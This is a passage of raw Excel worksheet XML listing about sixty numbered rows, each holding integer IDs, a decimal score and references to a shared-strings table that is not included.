        <v>5100</v>
      </c>
    </row>
    <row r="2583" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2583" s="1">
        <v>2581</v>
      </c>
      <c r="B2583">
        <v>6401</v>
      </c>
      <c r="C2583">
        <v>6401</v>
      </c>
      <c r="D2583">
        <v>1</v>
      </c>
      <c r="E2583">
        <v>0.57940000295639038</v>
      </c>
      <c r="F2583" t="s">
        <v>3911</v>
      </c>
      <c r="G2583" t="s">
        <v>5101</v>
      </c>
      <c r="H2583" t="s">
        <v>5102</v>
      </c>
    </row>
    <row r="2584" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2584" s="1">
        <v>2582</v>
      </c>
      <c r="B2584">
        <v>1514</v>
      </c>
      <c r="C2584">
        <v>1514</v>
      </c>
      <c r="D2584">
        <v>1</v>
      </c>
      <c r="E2584">
        <v>0.97640001773834229</v>
      </c>
      <c r="F2584" t="s">
        <v>3911</v>
      </c>
      <c r="G2584" t="s">
        <v>5103</v>
      </c>
      <c r="H2584" t="s">
        <v>5104</v>
      </c>
    </row>
    <row r="2585" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2585" s="1">
        <v>2583</v>
      </c>
      <c r="B2585">
        <v>1500</v>
      </c>
      <c r="C2585">
        <v>1500</v>
      </c>
      <c r="D2585">
        <v>1</v>
      </c>
      <c r="E2585">
        <v>0.46180000901222229</v>
      </c>
      <c r="F2585" t="s">
        <v>3911</v>
      </c>
      <c r="G2585" t="s">
        <v>5105</v>
      </c>
      <c r="H2585" t="s">
        <v>5106</v>
      </c>
    </row>
    <row r="2586" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2586" s="1">
        <v>2584</v>
      </c>
      <c r="B2586">
        <v>1537</v>
      </c>
      <c r="C2586">
        <v>1537</v>
      </c>
      <c r="D2586">
        <v>1</v>
      </c>
      <c r="E2586">
        <v>0.68580001592636108</v>
      </c>
      <c r="F2586" t="s">
        <v>3911</v>
      </c>
      <c r="G2586" t="s">
        <v>5107</v>
      </c>
      <c r="H2586" t="s">
        <v>5108</v>
      </c>
    </row>
    <row r="2587" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2587" s="1">
        <v>2585</v>
      </c>
      <c r="B2587">
        <v>1539</v>
      </c>
      <c r="C2587">
        <v>1539</v>
      </c>
      <c r="D2587">
        <v>1</v>
      </c>
      <c r="E2587">
        <v>0.96390002965927124</v>
      </c>
      <c r="F2587" t="s">
        <v>3911</v>
      </c>
      <c r="G2587" t="s">
        <v>5109</v>
      </c>
      <c r="H2587" t="s">
        <v>5110</v>
      </c>
    </row>
    <row r="2588" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2588" s="1">
        <v>2586</v>
      </c>
      <c r="B2588">
        <v>3550</v>
      </c>
      <c r="C2588">
        <v>3550</v>
      </c>
      <c r="D2588">
        <v>1</v>
      </c>
      <c r="E2588">
        <v>0.43930000066757202</v>
      </c>
      <c r="F2588" t="s">
        <v>3911</v>
      </c>
      <c r="G2588" t="s">
        <v>5111</v>
      </c>
      <c r="H2588" t="s">
        <v>5112</v>
      </c>
    </row>
    <row r="2589" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2589" s="1">
        <v>2587</v>
      </c>
      <c r="B2589">
        <v>1567</v>
      </c>
      <c r="C2589">
        <v>1567</v>
      </c>
      <c r="D2589">
        <v>1</v>
      </c>
      <c r="E2589">
        <v>0.65439999103546143</v>
      </c>
      <c r="F2589" t="s">
        <v>3911</v>
      </c>
      <c r="G2589" t="s">
        <v>5113</v>
      </c>
      <c r="H2589" t="s">
        <v>5114</v>
      </c>
    </row>
    <row r="2590" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2590" s="1">
        <v>2588</v>
      </c>
      <c r="B2590">
        <v>62</v>
      </c>
      <c r="C2590">
        <v>62</v>
      </c>
      <c r="D2590">
        <v>1</v>
      </c>
      <c r="E2590">
        <v>0.84119999408721924</v>
      </c>
      <c r="F2590" t="s">
        <v>3911</v>
      </c>
      <c r="G2590" t="s">
        <v>5115</v>
      </c>
      <c r="H2590" t="s">
        <v>5116</v>
      </c>
    </row>
    <row r="2591" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2591" s="1">
        <v>2589</v>
      </c>
      <c r="B2591">
        <v>1145</v>
      </c>
      <c r="C2591">
        <v>1145</v>
      </c>
      <c r="D2591">
        <v>1</v>
      </c>
      <c r="E2591">
        <v>0.99479997158050537</v>
      </c>
      <c r="F2591" t="s">
        <v>3911</v>
      </c>
      <c r="G2591" t="s">
        <v>5117</v>
      </c>
      <c r="H2591" t="s">
        <v>5118</v>
      </c>
    </row>
    <row r="2592" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2592" s="1">
        <v>2590</v>
      </c>
      <c r="B2592">
        <v>3703</v>
      </c>
      <c r="C2592">
        <v>3703</v>
      </c>
      <c r="D2592">
        <v>1</v>
      </c>
      <c r="E2592">
        <v>0.99879997968673706</v>
      </c>
      <c r="F2592" t="s">
        <v>3911</v>
      </c>
      <c r="G2592" t="s">
        <v>5119</v>
      </c>
      <c r="H2592" t="s">
        <v>5120</v>
      </c>
    </row>
    <row r="2593" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2593" s="1">
        <v>2591</v>
      </c>
      <c r="B2593">
        <v>1560</v>
      </c>
      <c r="C2593">
        <v>1560</v>
      </c>
      <c r="D2593">
        <v>1</v>
      </c>
      <c r="E2593">
        <v>0.40410000085830688</v>
      </c>
      <c r="F2593" t="s">
        <v>3911</v>
      </c>
      <c r="G2593" t="s">
        <v>5121</v>
      </c>
      <c r="H2593" t="s">
        <v>5122</v>
      </c>
    </row>
    <row r="2594" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2594" s="1">
        <v>2592</v>
      </c>
      <c r="B2594">
        <v>57</v>
      </c>
      <c r="C2594">
        <v>57</v>
      </c>
      <c r="D2594">
        <v>1</v>
      </c>
      <c r="E2594">
        <v>0.42300000786781311</v>
      </c>
      <c r="F2594" t="s">
        <v>3911</v>
      </c>
      <c r="G2594" t="s">
        <v>5123</v>
      </c>
      <c r="H2594" t="s">
        <v>5124</v>
      </c>
    </row>
    <row r="2595" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2595" s="1">
        <v>2593</v>
      </c>
      <c r="B2595">
        <v>61</v>
      </c>
      <c r="C2595">
        <v>61</v>
      </c>
      <c r="D2595">
        <v>1</v>
      </c>
      <c r="E2595">
        <v>0.55580002069473267</v>
      </c>
      <c r="F2595" t="s">
        <v>3911</v>
      </c>
      <c r="G2595" t="s">
        <v>5125</v>
      </c>
      <c r="H2595" t="s">
        <v>5126</v>
      </c>
    </row>
    <row r="2596" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2596" s="1">
        <v>2594</v>
      </c>
      <c r="B2596">
        <v>3702</v>
      </c>
      <c r="C2596">
        <v>3702</v>
      </c>
      <c r="D2596">
        <v>1</v>
      </c>
      <c r="E2596">
        <v>0.35929998755455023</v>
      </c>
      <c r="F2596" t="s">
        <v>3911</v>
      </c>
      <c r="G2596" t="s">
        <v>5127</v>
      </c>
      <c r="H2596" t="s">
        <v>5128</v>
      </c>
    </row>
    <row r="2597" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2597" s="1">
        <v>2595</v>
      </c>
      <c r="B2597">
        <v>5826</v>
      </c>
      <c r="C2597">
        <v>5826</v>
      </c>
      <c r="D2597">
        <v>1</v>
      </c>
      <c r="E2597">
        <v>0.63819998502731323</v>
      </c>
      <c r="F2597" t="s">
        <v>3911</v>
      </c>
      <c r="G2597" t="s">
        <v>5129</v>
      </c>
      <c r="H2597" t="s">
        <v>5130</v>
      </c>
    </row>
    <row r="2598" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2598" s="1">
        <v>2596</v>
      </c>
      <c r="B2598">
        <v>5909</v>
      </c>
      <c r="C2598">
        <v>5909</v>
      </c>
      <c r="D2598">
        <v>1</v>
      </c>
      <c r="E2598">
        <v>0.99479997158050537</v>
      </c>
      <c r="F2598" t="s">
        <v>3911</v>
      </c>
      <c r="G2598" t="s">
        <v>5131</v>
      </c>
      <c r="H2598" t="s">
        <v>5132</v>
      </c>
    </row>
    <row r="2599" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2599" s="1">
        <v>2597</v>
      </c>
      <c r="B2599">
        <v>1162</v>
      </c>
      <c r="C2599">
        <v>1162</v>
      </c>
      <c r="D2599">
        <v>1</v>
      </c>
      <c r="E2599">
        <v>0.93610000610351563</v>
      </c>
      <c r="F2599" t="s">
        <v>3911</v>
      </c>
      <c r="G2599" t="s">
        <v>5133</v>
      </c>
      <c r="H2599" t="s">
        <v>5134</v>
      </c>
    </row>
    <row r="2600" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2600" s="1">
        <v>2598</v>
      </c>
      <c r="B2600">
        <v>1163</v>
      </c>
      <c r="C2600">
        <v>1163</v>
      </c>
      <c r="D2600">
        <v>1</v>
      </c>
      <c r="E2600">
        <v>0.93569999933242798</v>
      </c>
      <c r="F2600" t="s">
        <v>3911</v>
      </c>
      <c r="G2600" t="s">
        <v>5135</v>
      </c>
      <c r="H2600" t="s">
        <v>5136</v>
      </c>
    </row>
    <row r="2601" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2601" s="1">
        <v>2599</v>
      </c>
      <c r="B2601">
        <v>4738</v>
      </c>
      <c r="C2601">
        <v>4738</v>
      </c>
      <c r="D2601">
        <v>1</v>
      </c>
      <c r="E2601">
        <v>0.64249998331069946</v>
      </c>
      <c r="F2601" t="s">
        <v>3911</v>
      </c>
      <c r="G2601" t="s">
        <v>5137</v>
      </c>
      <c r="H2601" t="s">
        <v>5138</v>
      </c>
    </row>
    <row r="2602" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2602" s="1">
        <v>2600</v>
      </c>
      <c r="B2602">
        <v>5910</v>
      </c>
      <c r="C2602">
        <v>5910</v>
      </c>
      <c r="D2602">
        <v>1</v>
      </c>
      <c r="E2602">
        <v>0.9968000054359436</v>
      </c>
      <c r="F2602" t="s">
        <v>3911</v>
      </c>
      <c r="G2602" t="s">
        <v>5139</v>
      </c>
      <c r="H2602" t="s">
        <v>5140</v>
      </c>
    </row>
    <row r="2603" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2603" s="1">
        <v>2601</v>
      </c>
      <c r="B2603">
        <v>6350</v>
      </c>
      <c r="C2603">
        <v>6350</v>
      </c>
      <c r="D2603">
        <v>1</v>
      </c>
      <c r="E2603">
        <v>0.99559998512268066</v>
      </c>
      <c r="F2603" t="s">
        <v>3911</v>
      </c>
      <c r="G2603" t="s">
        <v>5141</v>
      </c>
      <c r="H2603" t="s">
        <v>5142</v>
      </c>
    </row>
    <row r="2604" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2604" s="1">
        <v>2602</v>
      </c>
      <c r="B2604">
        <v>3698</v>
      </c>
      <c r="C2604">
        <v>3698</v>
      </c>
      <c r="D2604">
        <v>1</v>
      </c>
      <c r="E2604">
        <v>0.59270000457763672</v>
      </c>
      <c r="F2604" t="s">
        <v>3911</v>
      </c>
      <c r="G2604" t="s">
        <v>5143</v>
      </c>
      <c r="H2604" t="s">
        <v>5144</v>
      </c>
    </row>
    <row r="2605" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2605" s="1">
        <v>2603</v>
      </c>
      <c r="B2605">
        <v>1492</v>
      </c>
      <c r="C2605">
        <v>1492</v>
      </c>
      <c r="D2605">
        <v>1</v>
      </c>
      <c r="E2605">
        <v>0.9966999888420105</v>
      </c>
      <c r="F2605" t="s">
        <v>3911</v>
      </c>
      <c r="G2605" t="s">
        <v>5145</v>
      </c>
      <c r="H2605" t="s">
        <v>5146</v>
      </c>
    </row>
    <row r="2606" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2606" s="1">
        <v>2604</v>
      </c>
      <c r="B2606">
        <v>3590</v>
      </c>
      <c r="C2606">
        <v>3590</v>
      </c>
      <c r="D2606">
        <v>1</v>
      </c>
      <c r="E2606">
        <v>0.99730002880096436</v>
      </c>
      <c r="F2606" t="s">
        <v>3911</v>
      </c>
      <c r="G2606" t="s">
        <v>5147</v>
      </c>
      <c r="H2606" t="s">
        <v>5148</v>
      </c>
    </row>
    <row r="2607" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2607" s="1">
        <v>2605</v>
      </c>
      <c r="B2607">
        <v>7268</v>
      </c>
      <c r="C2607">
        <v>7268</v>
      </c>
      <c r="D2607">
        <v>1</v>
      </c>
      <c r="E2607">
        <v>0.99830001592636108</v>
      </c>
      <c r="F2607" t="s">
        <v>3911</v>
      </c>
      <c r="G2607" t="s">
        <v>5149</v>
      </c>
      <c r="H2607" t="s">
        <v>5150</v>
      </c>
    </row>
    <row r="2608" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2608" s="1">
        <v>2606</v>
      </c>
      <c r="B2608">
        <v>1450</v>
      </c>
      <c r="C2608">
        <v>1450</v>
      </c>
      <c r="D2608">
        <v>1</v>
      </c>
      <c r="E2608">
        <v>0.57889997959136963</v>
      </c>
      <c r="F2608" t="s">
        <v>3911</v>
      </c>
      <c r="G2608" t="s">
        <v>5151</v>
      </c>
      <c r="H2608" t="s">
        <v>5152</v>
      </c>
    </row>
    <row r="2609" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2609" s="1">
        <v>2607</v>
      </c>
      <c r="B2609">
        <v>1449</v>
      </c>
      <c r="C2609">
        <v>1449</v>
      </c>
      <c r="D2609">
        <v>1</v>
      </c>
      <c r="E2609">
        <v>0.83730000257492065</v>
      </c>
      <c r="F2609" t="s">
        <v>3911</v>
      </c>
      <c r="G2609" t="s">
        <v>5153</v>
      </c>
      <c r="H2609" t="s">
        <v>5154</v>
      </c>
    </row>
    <row r="2610" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2610" s="1">
        <v>2608</v>
      </c>
      <c r="B2610">
        <v>1448</v>
      </c>
      <c r="C2610">
        <v>1448</v>
      </c>
      <c r="D2610">
        <v>1</v>
      </c>
      <c r="E2610">
        <v>0.65549999475479126</v>
      </c>
      <c r="F2610" t="s">
        <v>3911</v>
      </c>
      <c r="G2610" t="s">
        <v>5155</v>
      </c>
      <c r="H2610" t="s">
        <v>5156</v>
      </c>
    </row>
    <row r="2611" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2611" s="1">
        <v>2609</v>
      </c>
      <c r="B2611">
        <v>7269</v>
      </c>
      <c r="C2611">
        <v>7269</v>
      </c>
      <c r="D2611">
        <v>1</v>
      </c>
      <c r="E2611">
        <v>0.99750000238418579</v>
      </c>
      <c r="F2611" t="s">
        <v>3911</v>
      </c>
      <c r="G2611" t="s">
        <v>5157</v>
      </c>
      <c r="H2611" t="s">
        <v>5158</v>
      </c>
    </row>
    <row r="2612" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2612" s="1">
        <v>2610</v>
      </c>
      <c r="B2612">
        <v>1204</v>
      </c>
      <c r="C2612">
        <v>1204</v>
      </c>
      <c r="D2612">
        <v>1</v>
      </c>
      <c r="E2612">
        <v>0.49649998545646667</v>
      </c>
      <c r="F2612" t="s">
        <v>3911</v>
      </c>
      <c r="G2612" t="s">
        <v>5159</v>
      </c>
      <c r="H2612" t="s">
        <v>5160</v>
      </c>
    </row>
    <row r="2613" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2613" s="1">
        <v>2611</v>
      </c>
      <c r="B2613">
        <v>3598</v>
      </c>
      <c r="C2613">
        <v>3598</v>
      </c>
      <c r="D2613">
        <v>1</v>
      </c>
      <c r="E2613">
        <v>0.99870002269744873</v>
      </c>
      <c r="F2613" t="s">
        <v>3911</v>
      </c>
      <c r="G2613" t="s">
        <v>5161</v>
      </c>
      <c r="H2613" t="s">
        <v>5162</v>
      </c>
    </row>
    <row r="2614" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2614" s="1">
        <v>2612</v>
      </c>
      <c r="B2614">
        <v>1444</v>
      </c>
      <c r="C2614">
        <v>1444</v>
      </c>
      <c r="D2614">
        <v>1</v>
      </c>
      <c r="E2614">
        <v>0.99610000848770142</v>
      </c>
      <c r="F2614" t="s">
        <v>3911</v>
      </c>
      <c r="G2614" t="s">
        <v>5163</v>
      </c>
      <c r="H2614" t="s">
        <v>5164</v>
      </c>
    </row>
    <row r="2615" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2615" s="1">
        <v>2613</v>
      </c>
      <c r="B2615">
        <v>1443</v>
      </c>
      <c r="C2615">
        <v>1443</v>
      </c>
      <c r="D2615">
        <v>1</v>
      </c>
      <c r="E2615">
        <v>0.57090002298355103</v>
      </c>
      <c r="F2615" t="s">
        <v>3911</v>
      </c>
      <c r="G2615" t="s">
        <v>5165</v>
      </c>
      <c r="H2615" t="s">
        <v>5166</v>
      </c>
    </row>
    <row r="2616" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2616" s="1">
        <v>2614</v>
      </c>
      <c r="B2616">
        <v>7271</v>
      </c>
      <c r="C2616">
        <v>7271</v>
      </c>
      <c r="D2616">
        <v>1</v>
      </c>
      <c r="E2616">
        <v>0.99739998579025269</v>
      </c>
      <c r="F2616" t="s">
        <v>3911</v>
      </c>
      <c r="G2616" t="s">
        <v>5167</v>
      </c>
      <c r="H2616" t="s">
        <v>5168</v>
      </c>
    </row>
    <row r="2617" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2617" s="1">
        <v>2615</v>
      </c>
      <c r="B2617">
        <v>3599</v>
      </c>
      <c r="C2617">
        <v>3599</v>
      </c>
      <c r="D2617">
        <v>1</v>
      </c>
      <c r="E2617">
        <v>0.99879997968673706</v>
      </c>
      <c r="F2617" t="s">
        <v>3911</v>
      </c>
      <c r="G2617" t="s">
        <v>5169</v>
      </c>
      <c r="H2617" t="s">
        <v>5170</v>
      </c>
    </row>
    <row r="2618" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2618" s="1">
        <v>2616</v>
      </c>
      <c r="B2618">
        <v>7906</v>
      </c>
      <c r="C2618">
        <v>7906</v>
      </c>
      <c r="D2618">
        <v>1</v>
      </c>
      <c r="E2618">
        <v>0.94230002164840698</v>
      </c>
      <c r="F2618" t="s">
        <v>3911</v>
      </c>
      <c r="G2618" t="s">
        <v>5171</v>
      </c>
      <c r="H2618" t="s">
        <v>5172</v>
      </c>
    </row>
    <row r="2619" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2619" s="1">
        <v>2617</v>
      </c>
      <c r="B2619">
        <v>3685</v>
      </c>
      <c r="C2619">
        <v>3685</v>
      </c>
      <c r="D2619">
        <v>1</v>
      </c>
      <c r="E2619">
        <v>0.96689999103546143</v>
      </c>
      <c r="F2619" t="s">
        <v>3911</v>
      </c>
      <c r="G2619" t="s">
        <v>5173</v>
      </c>
      <c r="H2619" t="s">
        <v>5174</v>
      </c>
    </row>
    <row r="2620" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2620" s="1">
        <v>2618</v>
      </c>
      <c r="B2620">
        <v>1445</v>
      </c>
      <c r="C2620">
        <v>1445</v>
      </c>
      <c r="D2620">
        <v>1</v>
      </c>
      <c r="E2620">
        <v>0.99080002307891846</v>
      </c>
      <c r="F2620" t="s">
        <v>3911</v>
      </c>
      <c r="G2620" t="s">
        <v>5175</v>
      </c>
      <c r="H2620" t="s">
        <v>5176</v>
      </c>
    </row>
    <row r="2621" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2621" s="1">
        <v>2619</v>
      </c>
      <c r="B2621">
        <v>1493</v>
      </c>
      <c r="C2621">
        <v>1493</v>
      </c>
      <c r="D2621">
        <v>1</v>
      </c>
      <c r="E2621">
        <v>0.99870002269744873</v>
      </c>
      <c r="F2621" t="s">
        <v>3911</v>
      </c>
      <c r="G2621" t="s">
        <v>5177</v>
      </c>
      <c r="H2621" t="s">
        <v>5178</v>
      </c>
    </row>
    <row r="2622" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2622" s="1">
        <v>2620</v>
      </c>
      <c r="B2622">
        <v>5554</v>
      </c>
      <c r="C2622">
        <v>5554</v>
      </c>
      <c r="D2622">
        <v>1</v>
      </c>
      <c r="E2622">
        <v>0.57940000295639038</v>
      </c>
      <c r="F2622" t="s">
        <v>3911</v>
      </c>
      <c r="G2622" t="s">
        <v>5179</v>
      </c>
      <c r="H2622" t="s">
        <v>5180</v>
      </c>
    </row>
    <row r="2623" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2623" s="1">
        <v>2621</v>
      </c>
      <c r="B2623">
        <v>3587</v>
      </c>
      <c r="C2623">
        <v>3587</v>
      </c>
      <c r="D2623">
        <v>1</v>
      </c>
      <c r="E2623">
        <v>0.33370000123977661</v>
      </c>
      <c r="F2623" t="s">
        <v>3911</v>
      </c>
      <c r="G2623" t="s">
        <v>5181</v>
      </c>
      <c r="H2623" t="s">
        <v>5182</v>
      </c>
    </row>
    <row r="2624" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2624" s="1">
        <v>2622</v>
      </c>
      <c r="B2624">
        <v>7250</v>
      </c>
      <c r="C2624">
        <v>7250</v>
      </c>
      <c r="D2624">
        <v>1</v>
      </c>
      <c r="E2624">
        <v>0.89770001173019409</v>
      </c>
      <c r="F2624" t="s">
        <v>3911</v>
      </c>
      <c r="G2624" t="s">
        <v>5183</v>
      </c>
      <c r="H2624" t="s">
        <v>5184</v>
      </c>
    </row>
    <row r="2625" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2625" s="1">
        <v>2623</v>
      </c>
      <c r="B2625">
        <v>5583</v>
      </c>
      <c r="C2625">
        <v>5583</v>
      </c>
      <c r="D2625">
        <v>1</v>
      </c>
      <c r="E2625">
        <v>0.99409997463226318</v>
      </c>
      <c r="F2625" t="s">
        <v>3911</v>
      </c>
      <c r="G2625" t="s">
        <v>5185</v>
      </c>
      <c r="H2625" t="s">
        <v>5186</v>
      </c>
    </row>
    <row r="2626" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2626" s="1">
        <v>2624</v>
      </c>
      <c r="B2626">
        <v>7375</v>
      </c>
      <c r="C2626">
        <v>7375</v>
      </c>
      <c r="D2626">
        <v>1</v>
      </c>
      <c r="E2626">
        <v>0.99510002136230469</v>
      </c>
      <c r="F2626" t="s">
        <v>3911</v>
      </c>
      <c r="G2626" t="s">
        <v>5187</v>
      </c>
      <c r="H2626" t="s">
        <v>5188</v>
      </c>
    </row>
    <row r="2627" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2627" s="1">
        <v>2625</v>
      </c>
      <c r="B2627">
        <v>7252</v>
      </c>
      <c r="C2627">
        <v>7252</v>
      </c>
      <c r="D2627">
        <v>1</v>
      </c>
      <c r="E2627">
        <v>0.99889999628067017</v>
      </c>
      <c r="F2627" t="s">
        <v>3911</v>
      </c>
      <c r="G2627" t="s">
        <v>5189</v>
      </c>
      <c r="H2627" t="s">
        <v>5190</v>
      </c>
    </row>
    <row r="2628" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2628" s="1">
        <v>2626</v>
      </c>
      <c r="B2628">
        <v>1481</v>
      </c>
      <c r="C2628">
        <v>1481</v>
      </c>
      <c r="D2628">
        <v>1</v>
      </c>
      <c r="E2628">
        <v>0.97070002555847168</v>
      </c>
      <c r="F2628" t="s">
        <v>3911</v>
      </c>
      <c r="G2628" t="s">
        <v>5191</v>
      </c>
      <c r="H2628" t="s">
        <v>5192</v>
      </c>
    </row>
    <row r="2629" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2629" s="1">
        <v>2627</v>
      </c>
      <c r="B2629">
        <v>1480</v>
      </c>
      <c r="C2629">
        <v>1480</v>
      </c>
      <c r="D2629">
        <v>1</v>
      </c>
      <c r="E2629">
        <v>0.91619998216629028</v>
      </c>
      <c r="F2629" t="s">
        <v>3911</v>
      </c>
      <c r="G2629" t="s">
        <v>5193</v>
      </c>
      <c r="H2629" t="s">
        <v>5194</v>
      </c>
    </row>
    <row r="2630" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2630" s="1">
        <v>2628</v>
      </c>
      <c r="B2630">
        <v>1465</v>
      </c>
      <c r="C2630">
        <v>1465</v>
      </c>
      <c r="D2630">
        <v>1</v>
      </c>
      <c r="E2630">
        <v>0.98979997634887695</v>
      </c>
      <c r="F2630" t="s">
        <v>3911</v>
      </c>
      <c r="G2630" t="s">
        <v>5195</v>
      </c>
      <c r="H2630" t="s">
        <v>5196</v>
      </c>
    </row>
    <row r="2631" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2631" s="1">
        <v>2629</v>
      </c>
      <c r="B2631">
        <v>7374</v>
      </c>
      <c r="C2631">
        <v>7374</v>
      </c>
      <c r="D2631">
        <v>1</v>
      </c>
      <c r="E2631">
        <v>0.99949997663497925</v>
      </c>
      <c r="F2631" t="s">
        <v>3911</v>
      </c>
      <c r="G2631" t="s">
        <v>5197</v>
      </c>
      <c r="H2631" t="s">
        <v>5198</v>
      </c>
    </row>
    <row r="2632" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2632" s="1">
        <v>2630</v>
      </c>
      <c r="B2632">
        <v>1196</v>
      </c>
      <c r="C2632">
        <v>1196</v>
      </c>
      <c r="D2632">
        <v>1</v>
      </c>
      <c r="E2632">
        <v>0.99599999189376831</v>
      </c>
      <c r="F2632" t="s">
        <v>3911</v>
      </c>
      <c r="G2632" t="s">
        <v>5199</v>
      </c>
      <c r="H2632" t="s">
        <v>5200</v>
      </c>
    </row>
    <row r="2633" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2633" s="1">
        <v>2631</v>
      </c>
      <c r="B2633">
        <v>3583</v>
      </c>
      <c r="C2633">
        <v>3583</v>
      </c>
      <c r="D2633">
        <v>1</v>
      </c>
      <c r="E2633">
        <v>0.6908000111579895</v>
      </c>
      <c r="F2633" t="s">
        <v>3911</v>
      </c>
      <c r="G2633" t="s">
        <v>5201</v>
      </c>
      <c r="H2633" t="s">
        <v>5202</v>
      </c>
    </row>
    <row r="2634" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2634" s="1">
        <v>2632</v>
      </c>
      <c r="B2634">
        <v>7373</v>
      </c>
      <c r="C2634">
        <v>7373</v>
      </c>
      <c r="D2634">
        <v>1</v>
      </c>
      <c r="E2634">
        <v>0.87059998512268066</v>
      </c>
      <c r="F2634" t="s">
        <v>3911</v>
      </c>
      <c r="G2634" t="s">
        <v>5203</v>
      </c>
      <c r="H2634" t="s">
        <v>5204</v>
      </c>
    </row>
    <row r="2635" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2635" s="1">
        <v>2633</v>
      </c>
      <c r="B2635">
        <v>5552</v>
      </c>
      <c r="C2635">
        <v>5552</v>
      </c>
      <c r="D2635">
        <v>1</v>
      </c>
      <c r="E2635">
        <v>0.99930000305175781</v>
      </c>
      <c r="F2635" t="s">
        <v>3911</v>
      </c>
      <c r="G2635" t="s">
        <v>5205</v>
      </c>
      <c r="H2635" t="s">
        <v>5206</v>
      </c>
    </row>
    <row r="2636" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2636" s="1">
        <v>2634</v>
      </c>
      <c r="B2636">
        <v>3585</v>
      </c>
      <c r="C2636">
        <v>3585</v>
      </c>
      <c r="D2636">
        <v>1</v>
      </c>
      <c r="E2636">
        <v>0.99900001287460327</v>
      </c>
      <c r="F2636" t="s">
        <v>3911</v>
      </c>
      <c r="G2636" t="s">
        <v>5207</v>
      </c>
      <c r="H2636" t="s">
        <v>5208</v>
      </c>
    </row>
    <row r="2637" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2637" s="1">
        <v>2635</v>
      </c>
      <c r="B2637">
        <v>1469</v>
      </c>
      <c r="C2637">
        <v>1469</v>
      </c>
      <c r="D2637">
        <v>1</v>
      </c>
      <c r="E2637">
        <v>0.85009998083114624</v>
      </c>
      <c r="F2637" t="s">
        <v>3911</v>
      </c>
      <c r="G2637" t="s">
        <v>5209</v>
      </c>
      <c r="H2637" t="s">
        <v>5210</v>
      </c>
    </row>
    <row r="2638" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2638" s="1">
        <v>2636</v>
      </c>
      <c r="B2638">
        <v>7253</v>
      </c>
      <c r="C2638">
        <v>7253</v>
      </c>
      <c r="D2638">
        <v>1</v>
      </c>
      <c r="E2638">
        <v>0.64160001277923584</v>
      </c>
      <c r="F2638" t="s">
        <v>3911</v>
      </c>
      <c r="G2638" t="s">
        <v>5211</v>
      </c>
      <c r="H2638" t="s">
        <v>5212</v>
      </c>
    </row>
    <row r="2639" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2639" s="1">
        <v>2637</v>
      </c>
      <c r="B2639">
        <v>920</v>
      </c>
      <c r="C2639">
        <v>920</v>
      </c>
      <c r="D2639">
        <v>1</v>
      </c>
      <c r="E2639">
        <v>0.55309998989105225</v>
      </c>
      <c r="F2639" t="s">
        <v>3911</v>
      </c>
      <c r="G2639" t="s">
        <v>5213</v>
      </c>
      <c r="H2639" t="s">
        <v>5214</v>
      </c>
    </row>
    <row r="2640" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2640" s="1">
        <v>2638</v>
      </c>
      <c r="B2640">
        <v>7480</v>
      </c>
      <c r="C2640">
        <v>7480</v>
      </c>
      <c r="D2640">
        <v>1</v>
      </c>
      <c r="E2640">
        <v>0.90549999475479126</v>
      </c>
      <c r="F2640" t="s">
        <v>3911</v>
      </c>
      <c r="G2640" t="s">
        <v>5215</v>
      </c>
      <c r="H2640" t="s">
        <v>5216</v>
      </c>
    </row>
    <row r="2641" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2641" s="1">
        <v>2639</v>
      </c>
      <c r="B2641">
        <v>4564</v>
